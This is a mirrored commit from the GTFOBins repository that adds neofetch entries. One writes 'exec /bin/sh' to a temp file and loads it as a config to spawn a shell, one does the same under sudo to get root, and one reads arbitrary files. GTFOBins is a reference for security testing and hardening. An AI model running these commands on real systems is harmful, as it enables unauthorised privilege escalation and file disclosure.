1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add neofetch shell

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
ymka-shelter 2022-05-09 12:41:13 +00:00 committed by GitHub
parent 4db207dac9
commit 720cc73c7e
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,12 +1,18 @@
---
description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
functions:
file-read:
shell:
- code: |
TF=$(mktemp)
echo 'exec /bin/sh' >$TF
neofetch --config $TF
file-read:
- description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
code: |
LFILE=file_to_read
neofetch --ascii $LFILE
sudo:
- code: |
LFILE=file_to_read
sudo neofetch --ascii $LFILE
TF=$(mktemp)
echo 'exec /bin/sh' >$TF
sudo neofetch --config $TF
---